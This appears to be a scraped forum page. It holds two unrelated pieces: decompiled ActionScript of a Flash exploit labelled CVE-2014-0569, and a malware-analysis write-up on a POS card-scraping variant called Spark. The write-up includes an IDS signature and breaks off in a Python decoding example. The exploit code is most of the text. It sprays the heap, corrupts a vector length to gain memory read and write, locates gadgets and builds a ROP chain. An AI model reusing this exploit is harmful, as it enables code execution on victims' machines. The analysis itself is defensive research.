this.quodo0(); return; }; _local2 = this.modo55(); 
_loc2_ = _local2; if (_local2 != 0){ this.quodo0(); return; }; this.gadsi(); this.kahncl(); this.quodo0(); } catch(error:Error) { textline(2, ((("errormsg: " + error.name) + " ") + error.message)); return; }; } public function textline(lnum:uint, text:String):void{ } public function pawn2c(param1:Number, param2:Number):Boolean{ var _loc3_ = Capabilities.version.toLowerCase().split(" "); if (_loc3_[0] != "win"){ return (false); }; this.mort5 = Number(_loc3_[1].substr(0, 4).split(",").join("")); if ((((this.mort5 < param1)) && ((this.mort5 > param2)))){ return (false); }; return (true); } private function birdzu():void{ this.slotl = 0x90909090; } public function hexdump(bytes:ByteArray, start:uint=1, length:uint=0):String{ var byte:int; var output:String = ""; var charbuf:String = ""; if (start == 0){ start = 1; }; if ((((length > bytes.length)) || ((length == 0)))){ length = bytes.length; }; bytes.position = (start - 1); var i:int = start; while (i < (length + 1)) { byte = bytes.readByte(); if ((((byte > 20)) && ((byte < 123)))){ charbuf = (charbuf + String.fromCharCode(byte)); } else { charbuf = (charbuf + "."); }; output = (output + (this.byte2hex(byte) + " ")); if ((i % 16) == 0){ output = (output + (("\t" + charbuf) + "\n")); charbuf = ""; }; i++; }; if ((i % 16) != 0){ while ((i % 16) != 0) { output = (output + " "); i++; }; output = (output + " "); output = (output + (("\t" + charbuf) + "\n")); }; return (output); } public function byte2hex(byte:uint):String{ var hex:String = ""; var arr:String = "FEDCBA"; var i:uint; while (i < 2) { if (((byte & (240 >> (i * 4))) >> (4 - (i * 4))) > 9){ hex = (hex + arr.charAt((15 - ((byte & (240 >> (i * 4))) >> (4 - (i * 4)))))); } else { hex = (hex + String(((byte & (240 >> (i * 4))) >> (4 - (i * 4))))); }; i++; }; return (hex); } private function want2d(param1:String):void{ var _loc4_:uint; var _loc5_:uint; var _loc6_ = 0; var _loc2_ = "_w2fPjM9CaS1b-KWLkcpATG8IuelEJR7ovm3hndqQ5D6XUF0ztgONiyxYrsBV4ZH"; this.pokeg.position 
= 1208; var _loc3_:uint; var n:ByteArray = new ByteArray(); n.length = (param1.length + 1); while (_loc3_ < param1.length) { _loc4_ = 0; _loc5_ = 0; while (_loc5_ < 4) { _loc6_ = _loc2_.indexOf(param1.charAt((_loc3_ + _loc5_))); _loc6_ = (_loc6_ & 63); _loc4_ = (_loc4_ | (_loc6_ << ((3 - _loc5_) * 6))); _loc5_++; }; _loc5_ = 0; while (_loc5_ < 3) { this.pokeg.writeByte(((_loc4_ >> ((2 - _loc5_) * 8)) & 0xFF)); n[(_loc3_ + _loc5_)] = ((_loc4_ >> ((2 - _loc5_) * 8)) & 0xFF); _loc5_++; }; n[(_loc3_ + _loc5_)] = ((_loc4_ >> ((2 - _loc5_) * 8)) & 0xFF); _loc3_ = (_loc3_ + 4); }; this.textline(1, "try hexdump"); this.textline(3, this.hexdump(this.pokeg, 1208, param1.length)); this.textline(1, "try done"); } private function pisa8():void{ var _loc1_:ByteArray; var _loc2_:Vector.<uint>; var _loc3_:uint; _loc3_ = 0; while (_loc3_ < this.whys3a) { this.magif[_loc3_] = new Vector.<Object>(); _loc3_++; }; _loc3_ = 0; while (_loc3_ < this.whys3a) { this.bios2t[_loc3_] = new Vector.<uint>(); _loc3_++; }; _loc3_ = 0; while (_loc3_ < this.whys3a) { _loc2_ = (this.bios2t[_loc3_] as Vector.<uint>); _loc2_.length = 1022; _loc2_[0] = this.crux1; _loc2_[1] = _loc3_; _loc1_ = new ByteArray(); _loc1_.length = 0x1000; _loc1_.endian = Endian.LITTLE_ENDIAN; _loc1_.position = 8; _loc1_.writeUnsignedInt(this.larkr); _loc1_.writeUnsignedInt(_loc3_); this.orlyfx[_loc3_] = _loc1_; _loc3_++; }; } private function manei():uint{ var pos:uint; var _loc2_:uint; var _loc3_:ByteArray; var _loc4_:Vector.<uint>; pos = uint((this.whys3a / 2)); var startpos:uint = pos; while (pos < this.whys3a) { _loc3_ = (this.orlyfx[pos] as ByteArray); ApplicationDomain.currentDomain.domainMemory = _loc3_; _loc3_.atomicCompareAndSwapLength(0x1000, 0); if (casi32(0x1000, 1022, 0x40000001) == 1022){ _loc2_ = (uint((this.whys3a / 2)) - 0x0100); while (_loc2_ < this.whys3a) { _loc4_ = (this.bios2t[_loc2_] as Vector.<uint>); if (_loc4_.length == 0x40000001){ this.fray6u = _loc4_; return (0); }; _loc2_++; }; }; pos++; }; 
return (1); } private function quodo0():void{ if (this.fray6u){ if (((this.bonom) && (this.gleeuo))){ this.sacs1y(this.bonom, this.gleeuo); }; if (this.rugau8){ this.fray6u[1073741823] = this.rugau8; }; this.fray6u[1073741822] = 1022; } else { do { } while (1); }; } public function fullk(param1:uint, param2:uint, param3:uint):uint{ var _loc4_:uint = (param1 >>> (8 * param3)); var _loc5_:uint = (((param3 == 0)) ? 0 : (param2 << ((4 - param3) * 8))); return ((_loc5_ | _loc4_)); } public function intog(param1:uint):uint{ var _loc2_:uint; var _loc3_:uint = (param1 % 4); param1 = (param1 - _loc3_); if (param1 >= this.hugh1){ _loc2_ = (((param1 - this.hugh1) - 8) / 4); } else { _loc2_ = (0x40000000 - (((this.hugh1 + 8) - param1) / 4)); }; var _loc4_:uint = this.fray6u[_loc2_]; if (_loc3_ == 0){ return (_loc4_); }; var _loc5_:uint = this.fray6u[(_loc2_ + 1)]; return (this.fullk(_loc4_, _loc5_, _loc3_)); } public function sacs1y(param1:uint, param2:uint):void{ var _loc3_:uint; if (param1 >= this.hugh1){ _loc3_ = (((param1 - this.hugh1) - 8) / 4); } else { _loc3_ = (0x40000000 - (((this.hugh1 + 8) - param1) / 4)); }; this.fray6u[_loc3_] = param2; } private function boobe():void{ var _loc2_:Vector.<Object>; var _loc1_:uint; while ((((_loc1_ < 30)) && ((this.rant2p < this.whys3a)))) { _loc2_ = (this.magif[this.rant2p] as Vector.<Object>); _loc2_.length = 30; _loc2_[1] = this.vola1; _loc2_[2] = this.pokeg; this.rant2p++; _loc1_++; }; } private function grity():uint{ var _loc1_:uint; var _loc2_:uint; var _loc3_:uint; var _loc4_:ByteArray; var _loc5_:uint; var _loc6_:uint; var _loc7_:uint; _loc1_ = 1; while (_loc1_ < 16) { _loc2_ = (_loc1_ * 0x0400); if (((!(this.hugh1)) && ((this.fray6u[_loc2_] == this.larkr)))){ _loc3_ = this.fray6u[(_loc2_ + 1)]; _loc4_ = (this.orlyfx[_loc3_] as ByteArray); _loc4_.clear(); _loc5_ = 0; while (this.fray6u[_loc2_] == this.larkr) { this.boobe(); if (_loc5_ == 30){ return (5); }; _loc5_++; }; if (((((!((this.fray6u[_loc2_] == this.larkr))) && 
((this.fray6u[(((this.mort5 <= 111)) ? (_loc2_ + 2) : (_loc2_ - 1))] == 128)))) && (!(((_loc6_ = this.fray6u[(_loc2_ + 9)]) == 0))))){ this.hugh1 = ((_loc6_ & 0xFFFFF000) - (_loc1_ * 0x1000)); if (this.hugh1 < 65536){ return (6); }; if ((((((this.intog((_loc6_ + 4)) == 30)) && ((this.intog((_loc6_ + 8)) == 1)))) && ((this.intog((_loc6_ + 20)) == 1)))){ this.bonom = (this.intog((_loc6_ + 12)) & 0xFFFFFFF8); this.gleeuo = this.intog(this.bonom); _loc7_ = (this.intog((_loc6_ + 16)) & 0xFFFFFFF8); if (this.mort5 < 114){ this.wombu3 = this.intog((_loc7_ + 56)); } else { _loc7_ = this.intog((_loc7_ + 64)); this.wombu3 = this.intog((_loc7_ + 8)); }; } else { return (7); }; }; } else { if (((!(this.rugau8)) && ((this.fray6u[_loc2_] == this.crux1)))){ this.rugau8 = this.fray6u[(_loc2_ - 1)]; }; }; if (((this.hugh1) && (this.rugau8))){ return (0); }; _loc1_++; }; if (((!(this.hugh1)) && (!(this.rugau8)))){ return (1); }; if (!(this.hugh1)){ return (2); }; if (!(this.rugau8)){ return (3); }; return (4); } public function midin():Boolean{ var _loc1_:uint = (this.gleeuo & 0xFFFF0000); while ((this.intog(_loc1_) & 0xFFFF) != 23117) { _loc1_ = (_loc1_ - 65536); }; this.talis0 = _loc1_; if (this.talis0){ this.dawnod = (this.talis0 + this.intog((this.talis0 + 60))); if ((this.intog(this.dawnod) & 0xFFFF) == 17744){ return (true); }; }; return (false); } public function weilwk():Boolean{ var _loc3_:uint; var _loc4_:uint; var _loc5_:uint; var _loc6_:uint; var _loc7_:uint; var _loc8_:uint; var _loc1_:uint = this.intog((this.dawnod + 28)); var _loc2_:uint = this.intog((this.dawnod + 44)); if (((_loc1_) && (_loc2_))){ _loc2_ = (_loc2_ + this.talis0); _loc3_ = this.intog(_loc2_); _loc4_ = 4; while (_loc4_ < _loc1_) { _loc5_ = this.intog((_loc2_ + _loc4_)); _loc6_ = 0; while (_loc6_ < 4) { _loc7_ = this.fullk(_loc3_, _loc5_, _loc6_); _loc8_ = (_loc7_ & 0xFFFF); if (((!(this.fund2)) && ((_loc8_ == 50068)))){ this.fund2 = (((_loc2_ + _loc4_) - 4) + _loc6_); }; if (((!(this.jump4)) && 
((_loc8_ == 50009)))){ this.jump4 = (((_loc2_ + _loc4_) - 4) + _loc6_); }; if (((!(this.dipseu)) && ((_loc8_ == 49992)))){ this.dipseu = (((_loc2_ + _loc4_) - 4) + _loc6_); }; if (((!(this.modsj)) && ((_loc8_ == 50000)))){ this.modsj = (((_loc2_ + _loc4_) - 4) + _loc6_); }; if (((!(this.buttkk)) && ((_loc7_ == 3277654153)))){ this.buttkk = (((_loc2_ + _loc4_) - 4) + _loc6_); }; _loc6_++; }; _loc3_ = _loc5_; if (((((((((this.fund2) && (this.jump4))) && (this.dipseu))) && (this.buttkk))) && (this.modsj))){ return (true); }; _loc4_ = (_loc4_ + 4); }; }; return (false); } public function modo55():uint{ var _loc2_:uint; var _loc3_:uint; var _loc4_:uint; var _loc5_:uint; var _loc6_:uint; var _loc7_:uint; var _loc1_:uint = (this.talis0 + this.intog((this.dawnod + 128))); while (true) { _loc2_ = this.intog(_loc1_); if (_loc2_ == 0){ break; }; _loc3_ = (this.talis0 + this.intog((_loc1_ + 12))); if (((((this.intog(_loc3_) & 1314014539) == 1314014539)) && (((this.intog((_loc3_ + 4)) & 842222661) == 842222661)))){ _loc4_ = 0; _loc2_ = (_loc2_ + this.talis0); while (true) { _loc5_ = this.intog(_loc2_); if (_loc5_ == 0){ break; }; _loc6_ = ((this.talis0 + _loc5_) + 2); if ((((((this.intog(_loc6_) == 1953655126)) && ((this.intog((_loc6_ + 4)) == 1097621877)))) && ((this.intog((_loc6_ + 8)) == 1668246636)))){ _loc7_ = (this.talis0 + this.intog((_loc1_ + 16))); this.sobsft = this.intog((_loc7_ + (_loc4_ * 4))); return ((((this.sobsft == 0)) ? 
4 : 0)); }; _loc2_ = (_loc2_ + 4); _loc4_++; }; return (3); }; _loc1_ = (_loc1_ + 20); }; return (2); } private function gadsi():void{ this.pokeg.position = 0; var _loc1_:uint; while (_loc1_ < 27) { this.pokeg.writeUnsignedInt((this.jump4 + 1)); _loc1_++; }; this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt(this.fund2); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt(this.modsj); this.pokeg.writeUnsignedInt(this.buttkk); this.pokeg.writeUnsignedInt(0x41414141); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt(this.slotl); this.pokeg.writeUnsignedInt(this.buttkk); this.pokeg.writeUnsignedInt(0x41414141); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt(this.buttkk); this.pokeg.writeUnsignedInt(0x41414141); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt((this.wombu3 + 1208)); this.pokeg.writeUnsignedInt(this.buttkk); this.pokeg.writeUnsignedInt(0x41414141); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt(this.buttkk); this.pokeg.writeUnsignedInt(this.buttkk); 
this.pokeg.writeUnsignedInt(0x41414141); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt(276335968); this.pokeg.writeUnsignedInt(this.buttkk); this.pokeg.writeUnsignedInt(0x41414141); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt(this.buttkk); this.pokeg.writeUnsignedInt(0x41414141); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt(this.modsj); this.pokeg.writeUnsignedInt(this.buttkk); this.pokeg.writeUnsignedInt(0x41414141); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt(3242323591); this.pokeg.writeUnsignedInt(this.buttkk); this.pokeg.writeUnsignedInt(0x41414141); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt(this.buttkk); this.pokeg.writeUnsignedInt(0x41414141); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt(0x41414141); this.pokeg.writeUnsignedInt(this.buttkk); 
this.pokeg.writeUnsignedInt(0x41414141); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt(this.buttkk); this.pokeg.writeUnsignedInt(this.buttkk); this.pokeg.writeUnsignedInt(0x41414141); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt(3271837833); this.pokeg.writeUnsignedInt(this.buttkk); this.pokeg.writeUnsignedInt(0x41414141); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt(this.buttkk); this.pokeg.writeUnsignedInt(0x41414141); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt(this.modsj); this.pokeg.writeUnsignedInt(this.buttkk); this.pokeg.writeUnsignedInt(0x41414141); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt(833423561); this.pokeg.writeUnsignedInt(this.buttkk); this.pokeg.writeUnsignedInt(0x41414141); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt(this.buttkk); 
this.pokeg.writeUnsignedInt(0x41414141); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt(0x41414141); this.pokeg.writeUnsignedInt(this.buttkk); this.pokeg.writeUnsignedInt(0x41414141); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt(this.buttkk); this.pokeg.writeUnsignedInt(this.buttkk); this.pokeg.writeUnsignedInt(0x41414141); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt(3272099977); this.pokeg.writeUnsignedInt(this.buttkk); this.pokeg.writeUnsignedInt(0x41414141); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt(this.buttkk); this.pokeg.writeUnsignedInt(0x41414141); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt(this.modsj); this.pokeg.writeUnsignedInt(this.buttkk); this.pokeg.writeUnsignedInt(0x41414141); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt(4134906824); this.pokeg.writeUnsignedInt(this.buttkk); 
this.pokeg.writeUnsignedInt(0x41414141); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt(this.buttkk); this.pokeg.writeUnsignedInt(0x41414141); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt(0x41414141); this.pokeg.writeUnsignedInt(this.buttkk); this.pokeg.writeUnsignedInt(0x41414141); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt(this.buttkk); this.pokeg.writeUnsignedInt(this.buttkk); this.pokeg.writeUnsignedInt(0x41414141); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt(3272362121); this.pokeg.writeUnsignedInt(this.buttkk); this.pokeg.writeUnsignedInt(0x41414141); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt(this.buttkk); this.pokeg.writeUnsignedInt(0x41414141); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt(64); this.pokeg.writeUnsignedInt(this.buttkk); 
this.pokeg.writeUnsignedInt(0x41414141); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt(0x1000); this.pokeg.writeUnsignedInt(this.buttkk); this.pokeg.writeUnsignedInt(0x41414141); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt(0x1000); this.pokeg.writeUnsignedInt(this.buttkk); this.pokeg.writeUnsignedInt(0x41414141); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt(0); this.pokeg.writeUnsignedInt(this.buttkk); this.pokeg.writeUnsignedInt(0x41414141); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt((this.jump4 + 1)); this.pokeg.writeUnsignedInt(this.buttkk); this.pokeg.writeUnsignedInt(0x41414141); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt(this.sobsft); this.pokeg.writeUnsignedInt(this.buttkk); this.pokeg.writeUnsignedInt(0x41414141); this.pokeg.writeUnsignedInt(this.fund2); } private function kahncl():void{ this.sacs1y(this.bonom, this.wombu3); new Number(this.vola1.toString()); } } }//package [/LIST] Sursa: Exploit.SWF.CVE-2014-0569 Decoded Code - Pastebin.com
21. Alina POS malware "sparks" off a new variant

Alina is a well-documented family of malware used to scrape Credit Card (CC) data from Point of Sale (POS) software. We published a series of in-depth write-ups on the capabilities Alina possesses as well as the progression of the versions. Xylitol has a nice write-up on the Command and Control (C&C) aspects of Alina. In this blog post I'd like to discuss a variant that first cropped up in late 2013 and has been seen in the wild as recently as a month ago. Some anti-virus companies have identified similar samples as JackPOS, but there are several interesting behavior differences that haven't been posted about in any other write-ups. It is clear that Alina, JackPOS, and this variant all bear close resemblances to each other, but there are behavioral differences that distinguish this version from the others which I have not seen detailed elsewhere. For the purposes of this write-up I will be referring to this variant as Spark.

AutoIt Staged Loader

The first and most interesting difference between Alina and Spark is that several of the samples have been found embedded in a compiled AutoIt script, which then loads the malware into memory. Both Security Affairs and Security Intelligence posted about a similar type of AutoIt compiled script being used as a loader with a JackPOS binary instead of Spark here and here, but did not provide many details. We will take a closer look at how the loader works. AutoIt "is a freeware BASIC-like scripting language designed for automating the Windows GUI and general scripting". This AutoIt script contains functions to allocate space in memory, map a binary into that memory, fix the relocations and Import Address Table, and execute the binary. A malicious binary is concatenated into a variable 4,000 bytes at a time and the script's functions are used to load and execute it.
The script is converted into a Windows executable by running the utility Aut2Exe, which produces a new binary with the malware inside it.

Figure 1: Compiling an AutoIt Script

Converting a script into an executable is a normal and useful part of AutoIt's functionality. I used a third party utility called Exe2Aut to recover the original script and retrieve the binary.

Figure 2: Decompiling an AutoIt Script

The use of AutoIt as a loader is an interesting tactic. We typically see malware authors writing a script to execute another binary on the system or perform some function needed to accomplish the dastardly deed the author set out to do. This script is then compiled using Aut2exe for AutoIt, py2exe for Python, or perl2exe for Perl. These programs include their respective interpreters in the compiled binary for executing the script and are generally considered to be unsophisticated malware. In this case, however, the script has a binary in a variable that is loaded into dynamic memory and fixes up all the addresses required for execution. This is a much more advanced technique and is reusable with different embedded binaries. Like all such loaders, it initially obfuscates artifacts such as strings and import tables from the malicious binary.

Startup

Previous versions of Alina picked a name from a list of legitimate sounding executable names and copied itself into the oh-so-common %APPDATA% folder under the chosen name. Instead, Spark creates a sub-folder in (surprise) %APPDATA% called "Install" and stores its malicious goodies in there. These malicious goodies include copying the original executable to %APPDATA%/Install/hkcmd.exe and writing a file called ntfs.dat. Spark will always copy itself as hkcmd.exe as opposed to previous Alina versions that selected from a list of varying names.

Figure 3: Spark Install Directory

At startup, the malware builds the path to %APPDATA%/Install/ntfs.dat and checks to see if the file exists.
If the file does not exist, it takes the system's volume serial ID and overwrites the first 6 digits with random upper- and/or lower-case characters. The result of this operation is written to ntfs.dat and is used as the unique ID for the bot. Here is an example:

Volume ID => "602C0256"
Random chars => "mRtyfo"
Unique ID => "mRtyfo56"

Figure 4: Random Character Generation

This differs from earlier variants, which just used the volume serial ID to identify the bot. If ntfs.dat does exist, the identifier is read into memory. This unique identifier is included in the POST message for all communication with the C&C server.

Like all the other versions of Alina, Spark also adds itself to the commonly used HKCU\Software\Microsoft\Windows\CurrentVersion\Run\hkcmd key in order to maintain persistence across reboots. Spark uses a named pipe to synchronize moving the malware from its original execution folder to the %APPDATA%/Install directory. The pipe name is generated as \\.\pipe\spark<uniqueID>, where <uniqueID> is the same value generated above. Using our previous example, the pipe name would be \\.\pipe\sparkmRtyfo56.

Black List

Alina includes a black list of processes that are not scraped for CC data. Spark takes the same black list as before and adds additional applications to it:

Figure 5: Black List Differences

Since the author is looking for CC data, the choice to add these processes is an easy one: they are highly unlikely to contain the data the author is seeking. The majority of the additions are system and common processes.

Spark Execution Flow

Here is a general overview of Spark's execution flow:

Figure 6: Spark Execution Flow

Communication

The final two differences in this variant have to do with communication with the C&C server. Where previous versions used "Alina vx.x" as the User-Agent, Spark now uses something that is supposed to look legitimate.
Figure 7: Spark POST Example

As you can see, in their attempt to look legitimate, the author still includes the bot version but forgets to include the closing parenthesis. Here is an IDS signature that has been used to detect Spark:

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN JackPOS Checkin"; flow:established,to_server; content:"POST"; http_method; content:".php"; http_uri; content:"User-Agent|3a 20|Mozilla/4.0 (compatible|3b| MSIE 7.0|3b| Windows NT 5.1|3b| InfoPath.1 Spark v1.1|0d 0a|"; http_header; fast_pattern:66,20; content:!"Referer|3a|"; http_header; pcre:"/\.php$/U"; reference:md5,3959fb5b5909d9c6fb9c9a408d35f67a; reference:url,trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-pos-ram-scraper-malware.pdf; classtype: slr-et; sid:4004777; rev:1;)

This signature refers to the sample as JackPOS, but I think this sample falls somewhere in the spectrum of malware between Alina and JackPOS. As you can see, the Spark name has come up several times, both in the POST communication and in the named pipe used by the malware. The use of a version number suggests that the malware author intended to produce additional versions.

The POST data communication with the C&C server retains the same structure as Alina from v5.2 on; however, Spark reverses the order of the XOR scheme used.

Figure 8: XOR'd POST Data

To recover the clear-text message, bytes 18 through 35 (red) are used as a running XOR key for bytes 76 (green) to the end of the data, and then the entire message is XOR'd with 0xAA. This decrypts the entire message. The yellow section (including the red bytes) contains the header information, while the green is the dynamic data. Earlier variants would first XOR the entire message with 0xAA and then grab bytes 18-35 to decode bytes from 76 to the end. A minor change, but sufficient in that it breaks any tools made to decode prior communications.
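The two decoding orders described above, as an added example in Python (not the author's spark.rb): it implements the Spark order and the earlier Alina order side by side, with matching encoders so the round trip can be checked on a constructed message, and shows why a decoder written for one order leaves the other's dynamic data masked with 0xAA. Offsets are assumed to be 0-based, with the key being bytes 18..35 inclusive; the sample message is constructed, not captured traffic.

```python
import string

# Offsets as described in the write-up, assumed 0-based: the running key is the
# 18 header bytes at offsets 18..35, and the dynamic data starts at offset 76.
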